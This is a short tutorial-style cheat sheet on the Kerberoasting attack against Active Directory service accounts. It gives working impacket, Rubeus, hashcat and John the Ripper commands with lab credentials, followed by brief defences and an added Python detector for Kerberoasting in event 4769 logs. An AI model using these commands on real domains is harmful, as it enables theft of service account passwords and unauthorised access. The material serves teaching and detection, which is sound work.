# Kerberoasting Attack

### Overview

**Kerberoasting** is a post-exploitation attack in **Active Directory** that targets **service accounts**.

* Service accounts can have **SPNs** registered.
* When a user requests a service ticket for an SPN, the **TGS is encrypted using the service account’s NT hash.**
* Any **authenticated domain user** can request these tickets.
* An attacker can **crack the ticket offline** to recover the service account’s password.

### Attack Prerequisites

* Valid domain user credentials (any low-priv user).
* At least one service account with an SPN.
* Weak or crackable service account passwords.

### Steps

1. Identify Service Accounts with SPNs.

   ```bash
   impacket-GetUserSPNs toffee.bth/SVC_TGS:password1 -dc-ip 10.10.10.100
   ```
2. Request the TGS from these SPNs.

   ```bash
   # Linux
   impacket-GetUserSPNs toffee.bth/SVC_TGS:password1 -dc-ip 10.10.10.100 -request

   # Windows
   .\Rubeus.exe kerberoast /outfile:hashes.kerberoast
   ```
3. Crack these hashes.

   ```bash
   # hashcat: mode 13100 is Kerberos 5 TGS-REP etype 23 (RC4-HMAC)
   hashcat -m 13100 kerberoast.txt wordlist.txt

   # John the Ripper (jumbo): wordlist is passed with --wordlist, the hash file comes last
   john --wordlist=wordlist.txt --format=krb5tgs kerberoast.txt
   ```

### Defences

1. Use Strong Service Account Passwords.
2. Minimize Service Account Privileges.
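Detection counterpart to the steps above, as an added example that is not part of this checklist: it scans constructed Windows Security event 4769 records (Kerberos service ticket requested) for the two signals a Kerberoast leaves in the logs, RC4 service tickets issued for user-held SPNs and one account requesting many distinct SPNs in a short window. The event tuple layout, sample names, window and threshold are assumptions.

```python
# Added example, not from the original page: a minimal Kerberoasting detector over Windows
# Security event 4769 (Kerberos service ticket requested) records.
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: (timestamp, requesting account, service name, ticket encryption type).
SAMPLE_4769_EVENTS = [
    ("2024-01-10T09:00:01", "alice@TOFFEE.BTH", "FILESRV01$", "0x12"),  # AES ticket, machine account
    ("2024-01-10T09:00:05", "alice@TOFFEE.BTH", "krbtgt", "0x12"),      # TGT-related, never roastable
    ("2024-01-10T09:01:00", "SVC_TGS@TOFFEE.BTH", "svc_sql", "0x17"),   # RC4 ticket for a user SPN
    ("2024-01-10T09:01:01", "SVC_TGS@TOFFEE.BTH", "svc_http", "0x17"),
    ("2024-01-10T09:01:02", "SVC_TGS@TOFFEE.BTH", "svc_backup", "0x17"),
    ("2024-01-10T09:01:03", "SVC_TGS@TOFFEE.BTH", "svc_mssql", "0x17"),
    ("2024-01-10T09:30:00", "bob@TOFFEE.BTH", "svc_sql", "0x12"),       # single AES request, ordinary use
]

RC4_ETYPES = {"0x17", "0x18"}  # RC4-HMAC / RC4-HMAC-EXP, what kerberoast tooling typically requests


def is_roastable_service(service_name):
    """User accounts holding an SPN are the target; machine accounts ($) and krbtgt are not."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def rc4_user_spn_requests(events):
    """(account, service) pairs where an RC4 ticket was issued for a user SPN."""
    return [(acct, svc) for _, acct, svc, etype in events
            if etype in RC4_ETYPES and is_roastable_service(svc)]


def bulk_spn_requesters(events, window=timedelta(minutes=5), threshold=3):
    """{account: distinct services} for accounts that requested tickets for at least
    `threshold` distinct user SPNs inside any interval of length `window`."""
    per_account = defaultdict(list)
    for ts, acct, svc, _ in events:
        if is_roastable_service(svc):
            per_account[acct].append((datetime.fromisoformat(ts), svc))
    flagged = {}
    for acct, reqs in per_account.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            in_window = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(in_window) >= threshold:
                flagged[acct] = in_window
                break
    return flagged


if __name__ == "__main__":
    print("RC4 tickets for user SPNs:", rc4_user_spn_requests(SAMPLE_4769_EVENTS))
    print("Bulk SPN requesters:", bulk_spn_requesters(SAMPLE_4769_EVENTS))
```

In a domain where service accounts are configured for AES only, every RC4 hit is worth an alert on its own; elsewhere the two signals together separate a roast from ordinary service use.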

